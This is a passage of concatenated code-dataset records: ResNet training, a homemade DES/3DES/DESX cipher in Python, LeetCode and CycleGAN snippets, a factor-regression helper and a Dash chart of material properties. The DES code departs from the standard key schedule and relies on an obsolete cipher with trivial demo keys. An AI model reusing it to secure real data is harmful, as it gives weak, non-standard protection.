BatchNormalization(axis=3, name=\"Start_BN_conv2\")(X)\r\n X = Activation(\"relu\")(X)\r\n \r\n X = identity_block(X, f=3, filters=128, stage=3, block=\"a\")\r\n X = identity_block(X, f=3, filters=128, stage=3, block=\"b\")\r\n \r\n X = Conv2D(256, kernel_size=(3, 3), strides=(2, 2), name=\"Mid_conv3\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = BatchNormalization(axis=3, name=\"Start_BN_conv3\")(X)\r\n X = Activation(\"relu\")(X)\r\n \r\n X = identity_block(X, f=3, filters=256, stage=4, block=\"a\")\r\n \r\n #stage 3\r\n #X = identity_block(X, f=3, filters=256, stage=3, block=\"a\")\r\n #X = identity_block(X, f=3, filters=256, stage=3, block=\"b\")\r\n\r\n # Final stage\r\n # Average pooling\r\n X = AveragePooling2D(pool_size=(2, 2))(X)\r\n\r\n # Output layer\r\n X = Flatten()(X) # flatten\r\n X = Dense(classes, activation=\"softmax\", name=\"fc\" + str(classes), kernel_initializer=glorot_uniform(seed=0))(X)\r\n\r\n # Create the model\r\n model = Model(inputs=X_input, outputs=X, name=\"ResNet50\")\r\n\r\n return model\r\n\r\n\r\ndef read_and_decode(filename):\r\n filename_queue = tf.train.string_input_producer([filename])\r\n reader = tf.TFRecordReader()\r\n _, serialized_example = reader.read(filename_queue)\r\n features = tf.parse_single_example(serialized_example, features={\r\n 'label': tf.FixedLenFeature([], tf.int64),\r\n 'img_raw': tf.FixedLenFeature([], tf.string)\r\n })\r\n\r\n img = tf.decode_raw(features['img_raw'], tf.uint8)\r\n img = tf.reshape(img, [64, 64, 3])\r\n img = tf.cast(img, tf.float32) * (1. / 255)\r\n\r\n label = tf.cast(features['label'], tf.int32)\r\n label = tf.one_hot(label, 12, 1, 0)\r\n return img, label\r\n\r\n# Instantiate the model graph\r\nmodel = ResNet(input_shape=(64, 64, 3), classes=12)\r\n\r\n# Compile the model to configure the learning process\r\nmodel.compile(optimizer=\"adam\", loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\r\n\r\n# Load the datasets\r\nimage1, label1 = read_and_decode(train_name)\r\nx_train, y_train = tf.train.batch([image1, label1], batch_size=TRAIN_SIZE, capacity=50000)\r\n\r\nimage2, label2 = read_and_decode(test_name)\r\nx_test, y_test = tf.train.batch([image2, label2], batch_size=TEST_SIZE, capacity=50000)\r\ninit = tf.global_variables_initializer()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n X_train, Y_train = sess.run([x_train, y_train])\r\n X_test, Y_test = sess.run([x_test, y_test])\r\n print(\"number of training examples = \" + str(X_train.shape[0]))\r\n print(\"number of test examples = \" + str(X_test.shape[0]))\r\n print(\"X_train shape: \" + str(X_train.shape))\r\n print(\"Y_train shape: \" + str(Y_train.shape))\r\n print(\"X_test shape: \" + str(X_test.shape))\r\n print(\"Y_test shape: \" + str(Y_test.shape))\r\n # Train the model\r\n model.summary()\r\n for i in range(EPOCH):\r\n model.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE, verbose=2, validation_split=0.1)\r\n\r\n # Evaluate performance on the test set\r\n preds = model.evaluate(X_test, Y_test)\r\n print(\"Loss = \" + str(preds[0]))\r\n print(\"Test Accuracy =\" + str(preds[1]))\r\n\r\n coord.request_stop()\r\n coord.join(threads)","sub_path":"deep learn course codes/ResNet for Plant Seedlings Classification/simple_ResNet8.py","file_name":"simple_ResNet8.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"574301538","text":"#!/usr/bin/env python3\n# prachee javiya\nfrom typing import List\nimport DES_tables as Table\n\n\ndef permutation(L: List[str], T: List[str]) -> List[str]:\n \"\"\"returns permuted list based on table T:List[str]\"\"\"\n new_L = L.copy()\n for i in range(len(T)):\n new_L[i] = L[T[i] - 1]\n\n return new_L\n\n\ndef generate_bit(text: str) -> List[str]:\n \"\"\"Convert characters to 8 bit utf-8,\n integers are converted to string\n \"\"\"\n text = list(bytes(str(text), 'utf-8'))\n b_text = []\n for x in text:\n # zero-pad each byte to 8 bits\n b = bin(x)[2:]\n if len(b) < 8:\n for _ in range(8 - len(b)):\n b = '0' + b\n #print(len(b), b)\n byte = list(b)\n for bit in byte:\n b_text.append(bit)\n return b_text\n\n\ndef intTObin(i: int) -> List[str]:\n \"\"\" results of the s_boxes are extended to 4 bits \n \"\"\"\n s = bin(i)\n l = []\n s1 = ''\n if len(s[2:]) < 4:\n for _ in range(4 - len(s[2:])):\n s1 = s1 + '0'\n s1 = s1 + s[2:]\n for x in s1:\n l.append(x)\n return l\n\n\ndef bit_rotation(n: int, b_key: List[str]) -> List[str]:\n \"\"\"breaks the list into 2 halves and rotates each by n:int positions\n \"\"\"\n left = b_key[:len(b_key) // 2].copy()\n right = b_key[(len(b_key) // 2):].copy()\n for _ in range(n):\n left.insert(0, left[-1])\n left.pop(-1)\n right.insert(0, right[-1])\n right.pop(-1)\n for x in right:\n left.append(x)\n return left\n\n\ndef subkey_generation(b_key: List[str]) -> List[List[str]]:\n \"\"\"\n returns list of 16 subkeys of size 48\n \"\"\"\n shift = [1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28]\n subkeys = []\n for i in range(16):\n subkeys.append(bit_rotation(shift[i], b_key))\n #printList(subkeys[i])\n subkeys[i] = permutation(subkeys[i], 
Table.PC2)\n subkeys[i] = subkeys[i][:48]\n return subkeys\n\n\ndef key_generation(key: str) -> List[List[str]]:\n \"\"\" generate main key b_key and returns subkeys using subkey generator\n \"\"\"\n b_key = generate_bit(key)\n while (len(b_key) < 64):\n print('short key, Enter new KEY:')\n b_key = generate_bit(input())\n #trim to 64 bits\n if (len(b_key) > 64):\n b_key = b_key[:64]\n #permute key\n b_key = permutation(b_key, Table.PC1)\n #key length to 56\n b_key = b_key[:56]\n\n #print(b_key, len(b_key))\n subkey = subkey_generation(b_key)\n return subkey\n\n\ndef printList(list1: List[str]) -> None:\n \"\"\"\n print the list of binary data as string\n \"\"\"\n l = list1.copy()\n for i in range(len(l)):\n l[i] = str(l[i])\n print(''.join(l))\n\n\ndef strList(list1: List[str]) -> str:\n \"\"\"\n return string of binary date\n \"\"\"\n l = list1.copy()\n for i in range(len(l)):\n l[i] = str(l[i])\n return ''.join(l)\n\n\ndef binList(l: List[str]) -> int:\n \"\"\"\n convert l:List[str] to int for usage S_box \n \"\"\"\n for i in range(len(l)):\n l[i] = str(l[i])\n return int(''.join(l), 2)\n\n\ndef extend_right(right: list) -> list:\n \"\"\"\n return expanded right permutation(right, Table.E)\n \"\"\"\n for _ in range(16):\n right.append(0)\n return permutation(right, Table.E)\n\n\ndef s_box_replacement(right: List[str]) -> List[str]:\n r = []\n for x in range(8):\n r.append(right[x * 6:(x + 1) * 6])\n for x in range(len(r)):\n r[x] = Table.S_box[x][binList(r[x])]\n r[x] = intTObin(r[x])\n #printList(r[x])\n for x in r[1:]:\n for b in x:\n r[0].append(b)\n #print(r[0], len(r[0]))\n return r[0]\n\n\ndef strtobin_list(str1: list) -> List[int]:\n for i in range(len(str1)):\n str1[i] = int(str1[i])\n return str1\n\n\ndef fnc(right: list, subkey: list) -> List[int]:\n #print('func:')\n\n e_right = extend_right(right)\n #printList(right)\n #print('e_right')\n #printList(e_right)\n r = []\n for i in range(len(e_right)):\n e_right[i] = int(e_right[i])\n\n for i in range(len(subkey)):\n subkey[i] = int(subkey[i])\n\n for i in range(len(subkey)):\n r.append(e_right[i] ^ subkey[i])\n #print('xor with subkey')\n #printList(r)\n r = s_box_replacement(r)\n #print('s_box')\n #printList(r)\n r = permutation(r, Table.P)\n #print('permute')\n #printList(r)\n return r\n\n\ndef xor_list(L1: list, L2: list) -> list:\n l = []\n for i in range(len(L1)):\n l.append(L1[i] ^ L2[i])\n return l\n\n\ndef add_space(plaintext: str) -> str:\n \"\"\"\n add spaces to plaintext if len(plaintext)%8 > 0 \n \"\"\"\n if len(plaintext) % 8 > 0:\n for _ in range(8 - len(plaintext) % 8):\n plaintext = plaintext + ' '\n return plaintext\n\n\ndef converttext(plaintext):\n return plaintext\n\n\ndef DES_encrypt(plaintext, key, binary_input: bool = False):\n subkeys = key_generation(key)\n if not binary_input:\n plaintext = add_space(plaintext)\n plaintext = generate_bit(plaintext)\n else:\n plain_list = []\n for x in plaintext:\n plain_list.append(x)\n plaintext = plain_list\n blocks = []\n #create blocks\n for i in range(len(plaintext) // 64):\n blocks.append(plaintext[i * 64:(i + 1) * 64])\n #printList(blocks)\n encrypt_blocks = ''\n for block in blocks:\n #print('Start:')\n #printList(block)\n block = permutation(block, Table.IP)\n #print('IP:')\n #printList(block)\n for i in range(16):\n left = block[:32].copy()\n right = block[32:].copy()\n block[:32] = right\n block[32:] = xor_list(strtobin_list(left),\n strtobin_list(fnc(right, subkeys[i])))\n #print('round', i)\n #printList(block)\n block = permutation(block, Table.IP_inv)\n 
#print('IP_inv:')\n #print(strList(block), len(block))\n encrypt_blocks = encrypt_blocks + strList(block)\n return encrypt_blocks\n\n\ndef DES_decrypt(crypt, key, binary_output: bool = False):\n subkeys = key_generation(key)\n blocks = []\n for i in range(len(crypt) // 64):\n block = []\n for x in range(64):\n block.append(crypt[i * 64 + x])\n blocks.append(block)\n plaintext = ''\n #print(blocks, len(blocks))\n for block in blocks:\n #print('D_Start:')\n #printList(block)\n block = permutation(block, Table.IP)\n #print('D-IP:')\n #printList(block)\n for i in range(16):\n left = block[:32].copy()\n right = block[32:].copy()\n block[32:] = left\n block[:32] = xor_list(strtobin_list(right),\n strtobin_list(fnc(left, subkeys[15 - i])))\n #print('D_round', 15 - i)\n #printList(block)\n block = permutation(block, Table.IP_inv)\n #print('D_IP_inv:')\n #print(strList(block), len(block))\n #print(type(block[0]))\n if not binary_output:\n plaintext = plaintext + backToString(strList(block))[2:-1]\n else:\n plaintext = plaintext + strList(block)\n return plaintext\n\n\ndef backToString(s: str) -> str:\n \"\"\"\n convert block data back to string\n \"\"\"\n I_str = []\n for i in range(len(s) // 8):\n I_str.append(int(s[i * 8:(i + 1) * 8], 2))\n return str(bytes(I_str))\n\n\ndef DES3_encrypt(plaintext, key1, key2, key3):\n return DES_encrypt(DES_decrypt(DES_encrypt(plaintext, key1), key2, True),\n key3, True)\n\n\ndef DES3_decrypt(e_text, key1, key2, key3):\n return DES_decrypt(\n DES_encrypt(DES_decrypt(e_text, key3, True), key2, True), key1)\n\n\ndef DESX_xor(text, key, after_DESX_encrypt: bool = False):\n key = strtobin_list(generate_bit(key))[:64]\n if after_DESX_encrypt:\n b_text = []\n for x in text:\n b_text.append(int(x))\n else:\n b_text = strtobin_list(generate_bit(text))\n\n final_text = ''\n for i in range(len(b_text) // 64):\n x1 = xor_list(b_text[i * 64:(i + 1) * 64], key)\n for x in x1:\n final_text = final_text + str(x)\n return final_text\n\n\ndef DESX_encrypt(plaintext, key0, key1, key2):\n plaintext = add_space(plaintext)\n final_plaintext = DESX_xor(plaintext, key0)\n e_text = DES_encrypt(final_plaintext, key1, True)\n final_e_text = DESX_xor(e_text, key2, True)\n #print(final_e_text, len(final_e_text))\n return final_e_text\n\n\ndef DESX_decrypt(e_text, key0, key1, key2):\n f_e_text = DESX_xor(e_text, key2, True)\n plaintest = DES_decrypt(f_e_text, key1, True)\n f_plaintext = DESX_xor(plaintest, key0, True)\n print(backToString(f_plaintext)[2:-1])\n\n\nif __name__ == \"__main__\":\n #print('E_text', DES_encrypt('I\\'m Feeling Lucky!', '42234abc1'))\n #print(\n # DES_decrypt(DES_encrypt('I\\'m Feeling Lucky!', '42234abc1'),\n # '42234abc1'), )\n x = DESX_encrypt('Hello, World!', 11111111, 22222222, 33333333)\n DESX_decrypt(x, 11111111, 22222222, 33333333)\n #d1 = DES3_decrypt(e_text, 33333333, 22222222, 11111111)\n #print(e_text)\n #print(d1)\n #print(generate_bit('abc'), len(generate_bit('abc')))\n","sub_path":"DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"282543903","text":"def RemoveDuplicatesfromSortedArray(nums):\n if len(nums) == 0:\n return 0\n\n i = 0\n for index, num in enumerate(nums):\n if i == index:\n continue\n if num != nums[i]:\n i += 1\n nums[i] = num\n\n return i+1\n\n\nprint(RemoveDuplicatesfromSortedArray([1, 1, 
2]))\n","sub_path":"leetcode/easy/RemoveDuplicatesfromSortedArray.py","file_name":"RemoveDuplicatesfromSortedArray.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"131713374","text":"import glob\nimport random\nimport os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n self.transform = transforms.Compose(transforms_)\n self.unaligned = unaligned\n\n self.files_A = sorted(glob.glob(os.path.join(root, '%s/A' % mode) + '/*.*'))\n self.files_B = sorted(glob.glob(os.path.join(root, '%s/B' % mode) + '/*.*'))\n\n def __getitem__(self, index):\n A_correct = False\n B_correct = False\n\n A_name = self.files_A[index % len(self.files_A)]\n img_A = Image.open(A_name)\n try:\n item_A = self.transform(img_A)\n A_correct = True\n except:\n print(\"Wrong transform A: \", A_name)\n\n if self.unaligned:\n B_name = self.files_B[random.randint(0, len(self.files_B) - 1)]\n img_B = Image.open(B_name)\n try:\n item_B = self.transform(img_B)\n B_correct = True\n except:\n print(\"Wrong transform B: \", B_name)\n else:\n B_name = self.files_B[index % len(self.files_B)]\n img_B = Image.open(B_name)\n try:\n item_B = self.transform(img_B)\n B_correct = True\n except:\n print(\"Wrong transform B: \", B_name)\n\n if not A_correct or not B_correct: # if data encounter error\n return []\n\n return {'A': item_A, 'B': item_B}\n\n def __len__(self):\n return max(len(self.files_A), len(self.files_B))\n","sub_path":"implementations/cyclegan/datasets_box.py","file_name":"datasets_box.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372935127","text":"import collections\n\n\nclass Solution:\n def maxResult(self, a, k: int) -> int:\n n = len(a)\n dp = [0] * (n + 1)\n q = collections.deque()\n for i in range(1, n + 1):\n if not q:\n dp[i] = a[i - 1]\n else:\n dp[i] = a[i - 1] + dp[q[0]]\n while q and dp[q[-1]] <= dp[i]:\n q.pop()\n while q and i - q[0] >= k:\n q.popleft()\n q.append(i)\n return dp[n]\n\n\ns = Solution()\nprint(s.maxResult([1, -1, -2, 4, -7, 3], 2))\nprint(s.maxResult([10, -5, -2, 4, 0, 3], 3))\nprint(s.maxResult([1, -5, -20, 4, -1, 3, -6, -3], 2))\n","sub_path":"leetcode/2020/contest/weekly-220/Contest3.py","file_name":"Contest3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266531774","text":"# \n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom lib.gftTools import gftIO\nfrom functools import reduce \nfrom datetime import datetime \n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import preprocessing\n\ndef GetRetData(context,Y,X):\n ##step1:get stock return date range,stock list\n df_y=Y\n df_x=X\n df_y=df_y.asMatrix()\n ls_y_date_range=list(df_y.index)\n \n ##step2:get factor loading,factorname,date range,stock list\n dict_x={df_x[i][0]:df_x[i][1].asMatrix() for i in range(len(df_x))} \n dict_datelength={i:len(j.index) for i,j in dict_x.items()}\n float_quantile=np.percentile(a=(list(dict_datelength.values())),q=5)\n dict_x={k: v for k, v in dict_x.items() if len(v.index) >= float_quantile}\n ls_allfactor_name=list(dict_x.keys())\n ls_x_date=[list(i.index) for i in dict_x.values()]\n 
ls_alldates_x=reduce(np.intersect1d,ls_x_date) \n \n ##step3:get date mapping for regression\n df_date_mapping=pd.DataFrame(data=ls_y_date_range,columns=['ret_date'])\n df_date_mapping['x_date']=df_date_mapping.shift(1)\n df_date_mapping_fnl = df_date_mapping[df_date_mapping.x_date.isin(list(ls_alldates_x))].copy()\n \n ##step4:get all symbols for regression,prepare all x/y data\n ls_y_dates= list(df_date_mapping_fnl.ret_date) \n dict_symbol={date: np.unique(df_y[df_y.index == date].T.dropna().index) for date in ls_y_dates}\n \n dict_x={date:x_merge(df_x,date,ls_allfactor_name,dict_symbol,df_date_mapping) for date in ls_y_dates}\n dict_y={date:df_y[df_y.index == date].T.reindex(index=dict_symbol[date]) for date in ls_y_dates}\n \n dict_expo_filter={k: missingpre(v) for k, v in dict_x.items()}### may cause the number of factors per day to be inconsistent\n dict_expo_std={k: (v -v.mean(axis=0))/v.std(axis=0) for k, v in dict_expo_filter.items()}\n dict_expo_std_new={k: v.apply(lambda x:(x-min(x))/(max(x)-min(x))) for k, v in dict_expo_std.items()}\n return (dict_expo_std_new,dict_y)\n \ndef x_merge(df_x,date,ls_allfactor_name,dict_symbol,df_date_mapping):\n x_date=list(df_date_mapping[df_date_mapping.ret_date == date].x_date)[0]\n ls_raw_df_x=[df_x[i][1].asMatrix().reindex(index=[x_date],columns=dict_symbol[date]).rename(index={x_date:df_x[i][0]}) for i in range(len(ls_allfactor_name))] \n df_x_onedate=pd.concat(ls_raw_df_x,axis=0).T\n return df_x_onedate\ndef missingpre(v):\n df_expoonedate=v\n if len(df_expoonedate.columns) != len(np.unique(df_expoonedate.columns)):\n df_expoonedate=df_expoonedate.T.reset_index()\n df_expoonedate=df_expoonedate.drop_duplicates(subset='index').set_index(['index']).T\n dict_missingrate ={i:df_expoonedate[i].count()/df_expoonedate.shape[0] for i in list(df_expoonedate.columns)}\n dict_missingrate_filter={m: n for m,n in dict_missingrate.items() if n >= 0.8}\n ls_leftfactor=list(dict_missingrate_filter.keys())\n \n df_expoonedate_del=df_expoonedate.reindex(columns=ls_leftfactor)\n df_expoonedate_del=df_expoonedate_del.fillna(df_expoonedate_del.mean(axis=0,skipna=True))\n return df_expoonedate_del\n\n# \n\n\n\n# \n\n\n","sub_path":"owner/王秋君/GetRetData.py","file_name":"GetRetData.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"223918164","text":"from pygadgetreader import *\nimport numpy as np\n\nimport sys\nsys.path.insert(0, '/home/hungjinh/Research/baryon_proj/code')\nfrom cal_Pk_tool_MBII import *\n\n\n\ntemp_save_dir=\"/home/hungjinh/Research/baryon_proj/code/temp_storage/MBII_DMO_512/\"\n\nbasePath= '/physics/nkhandai/mb2dmo/'\n\nsnap=199\nNsubfiles=1024\nboxsize=100. 
# comoving Mpc/h\nresol = 512\nVbox=boxsize**3\n\n\nden=build_den_cube_DMO_MB2(snap,basePath,boxsize,resol,Nsubfiles)\n\nnp.save(temp_save_dir+\"den.npy\",den)\n","sub_path":"large_job/old_code/gen_den_cube_MBII_DMO.py","file_name":"gen_den_cube_MBII_DMO.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539641917","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\n\n########### Define your variables\nbeers=['High carbon steel', 'Low carbon steel', ' Cast iron']\nbeers1=['Aluminium alloys', 'Stainless steel', ' Carbon fibre composite']\nbeers2 = ['Nickle alloy','Copper alloys']\nibu_values=[75,76,72,254,78,14,842,864]\nabv_values=[9.27,0,0,51,18.1,0,9,18.3]\ni_values = [260,247,217,97.1,251,63.3,282,146]\nj_values = [75.7,89.4,0,69.3,54,88.3,88.2,69.2]\nk_values = [46.4,31.7,17.9,45.2,86.4,0,38,34.7]\nl_values = [286,266,235,116,294,1030,296,231]\nm_values = [1120,716,310,344,941,1230,902,512]\nn_values = [896,519,124,278,669,1.55,585,384]\no_values = [14.30,20.20,6.67,9.94,26.50,94.60,33.80,22.60]\np_values = [200,202,118,77.4,196,0,207,119]\nq_values = [79.9,79.7,47.6,19.9,77.6,3.11,77.5,44.9]\nr_values = [160,160,0,0,166,0,0,140]\ns_values = [29.2,29,29.4,32.7,28.9,29.3,31.6,31.7]\nt_values = [2260,0,575,260,0,999,689,525]\nu_values = [2160,0,943,95.7,0,725,0,529]\nv_values = [53.05,61.30,48.80,55.90,31.70,0.00,0.00,32.60]\nw_values = [89,965,297,0,115,10.4,131,33.7]\nz_values = [34.1,54.9,0,7.91,115,0,151,47.8]\nmytitle='Elements : High carbon steel,Low carbon steel, Cast iron'\nmytitle1 = 'Elements : Aluminium alloys,Stainless steel,Carbon fibre composite'\nmytitle2 = 'Elements : Nickle alloy, Copper alloys'\ncolor1='lightblue'\ncolor2='darkgreen'\n\ntabtitle='Mech Project'\nmyheading='Elements Comparison'\nlabel1='IBU'\nlabel2='ABV'\n\n\n########### Set up the chart\nbitterness = go.Bar(\n x=beers,\n y=[ibu_values[0],ibu_values[1],ibu_values[2]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol = go.Bar(\n x=beers,\n y=[abv_values[0],abv_values[1],abv_values[2]],\n name='Particle Size',\n marker={'color':color2}\n)\ni = go.Bar(\n x = beers,\n y=[i_values[0],i_values[1],i_values[2]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj = go.Bar(\n x = beers,\n y = [j_values[0],j_values[1],j_values[2]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk = go.Bar(\n x = beers,\n y = [k_values[0],k_values[1],k_values[2]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl = go.Bar(\n x = beers,\n y = [l_values[0],l_values[1],l_values[2]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm = go.Bar(\n x = beers,\n y = [m_values[0],m_values[1],m_values[2]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn = go.Bar(\n x = beers,\n y = [n_values[0],n_values[1],n_values[2]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no = go.Bar(\n x = beers,\n y = [o_values[0],o_values[1],o_values[2]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np = go.Bar(\n x = beers,\n y = [p_values[0],p_values[1],p_values[2]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq = go.Bar(\n x = beers,\n y = [q_values[0],q_values[1],q_values[2]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr = go.Bar(\n x = beers,\n y = [r_values[0],r_values[1],r_values[2]],\n 
name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns = go.Bar(\n x = beers,\n y = [s_values[0],s_values[1],s_values[2]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt = go.Bar(\n x = beers,\n y = [t_values[0],t_values[1],t_values[2]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu = go.Bar(\n x = beers,\n y = [u_values[0],u_values[1],u_values[2]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv = go.Bar(\n x = beers,\n y = [v_values[0],v_values[1],v_values[2]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw = go.Bar(\n x = beers,\n y = [w_values[0],w_values[1],w_values[2]],\n name = 'Izod Impact*10',\n marker = {'color' : 'darkorange'}\n)\nz = go.Bar(\n x = beers,\n y = [z_values[0],z_values[1],z_values[2]],\n name = 'Charpy Impact',\n marker = {'color' : 'sienna'}\n) \n\n\nbeer_data = [bitterness, alcohol,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,z]\nbeer_layout = go.Layout(\n barmode='group',\n title = mytitle\n)\n\nbeer_fig = go.Figure(data=beer_data, layout=beer_layout)\n#######################################################################\nbitterness1 = go.Bar(\n x=beers1,\n y=[ibu_values[3],ibu_values[4],ibu_values[5]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol1 = go.Bar(\n x=beers1,\n y=[abv_values[3],abv_values[4],abv_values[5]],\n name='Particle Size',\n marker={'color':color2}\n)\ni1 = go.Bar(\n x = beers1,\n y=[i_values[3],i_values[4],i_values[5]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj1 = go.Bar(\n x = beers1,\n y = [j_values[3],j_values[4],j_values[5]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk1 = go.Bar(\n x = beers1,\n y = [k_values[3],k_values[4],k_values[5]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl1 = go.Bar(\n x = beers1,\n y = [l_values[3],l_values[4],l_values[5]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm1 = go.Bar(\n x = beers1,\n y = [m_values[3],m_values[4],m_values[5]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn1 = go.Bar(\n x = beers1,\n y = [n_values[3],n_values[4],n_values[5]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no1 = go.Bar(\n x = beers1,\n y = [o_values[3],o_values[4],o_values[5]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np1 = go.Bar(\n x = beers1,\n y = [p_values[3],p_values[4],p_values[5]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq1 = go.Bar(\n x = beers1,\n y = [q_values[3],q_values[4],q_values[5]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr1 = go.Bar(\n x = beers1,\n y = [r_values[3],r_values[4],r_values[5]],\n name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns1 = go.Bar(\n x = beers1,\n y = [s_values[3],s_values[4],s_values[5]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt1 = go.Bar(\n x = beers1,\n y = [t_values[3],t_values[4],t_values[5]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu1 = go.Bar(\n x = beers1,\n y = [u_values[3],u_values[4],u_values[5]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv1 = go.Bar(\n x = beers1,\n y = [v_values[3],v_values[4],v_values[5]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw1 = go.Bar(\n x = beers1,\n y = [w_values[3],w_values[4],w_values[5]],\n name = 'Izod Impact*10',\n marker = {'color' : 
'darkorange'}\n)\nz1 = go.Bar(\n x = beers1,\n y = [z_values[3],z_values[4],z_values[5]],\n name = 'Charpy Impact',\n marker = {'color' : 'sienna'}\n) \n\n\nbeer_data1 = [bitterness1, alcohol1,i1,j1,k1,l1,m1,n1,o1,p1,q1,r1,s1,t1,u1,v1,w1,z1]\nbeer_layout1 = go.Layout(\n barmode='group',\n title = mytitle1\n)\n\nbeer_fig1 = go.Figure(data=beer_data1, layout=beer_layout1)\n###########################################################################################\nbitterness2 = go.Bar(\n x=beers2,\n y=[ibu_values[6],ibu_values[7]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol2 = go.Bar(\n x=beers2,\n y=[abv_values[6],abv_values[7]],\n name='Particle Size',\n marker={'color':color2}\n)\ni2 = go.Bar(\n x = beers2,\n y=[i_values[6],i_values[7]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj2 = go.Bar(\n x = beers2,\n y = [j_values[6],j_values[7]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk2 = go.Bar(\n x = beers2,\n y = [k_values[6],k_values[7]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl2 = go.Bar(\n x = beers2,\n y = [l_values[6],l_values[7]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm2 = go.Bar(\n x = beers2,\n y = [m_values[6],m_values[7]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn2 = go.Bar(\n x = beers2,\n y = [n_values[6],n_values[7]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no2 = go.Bar(\n x = beers2,\n y = [o_values[6],o_values[7]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np2 = go.Bar(\n x = beers2,\n y = [p_values[6],p_values[7]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq2 = go.Bar(\n x = beers2,\n y = [q_values[6],q_values[7]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr2 = go.Bar(\n x = beers2,\n y = [r_values[6],r_values[7]],\n name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns2 = go.Bar(\n x = beers2,\n y = [s_values[6],s_values[7]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt2 = go.Bar(\n x = beers2,\n y = [t_values[6],t_values[7]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu2 = go.Bar(\n x = beers2,\n y = [u_values[6],u_values[7]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv2 = go.Bar(\n x = beers2,\n y = [v_values[6],v_values[7]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw2 = go.Bar(\n x = beers2,\n y = [w_values[6],w_values[7]],\n name = 'Izod Impact*10',\n marker = {'color' : 'darkorange'}\n)\nz2 = go.Bar(\n x = beers2,\n y = [z_values[6],z_values[7]],\n name = 'Charpy 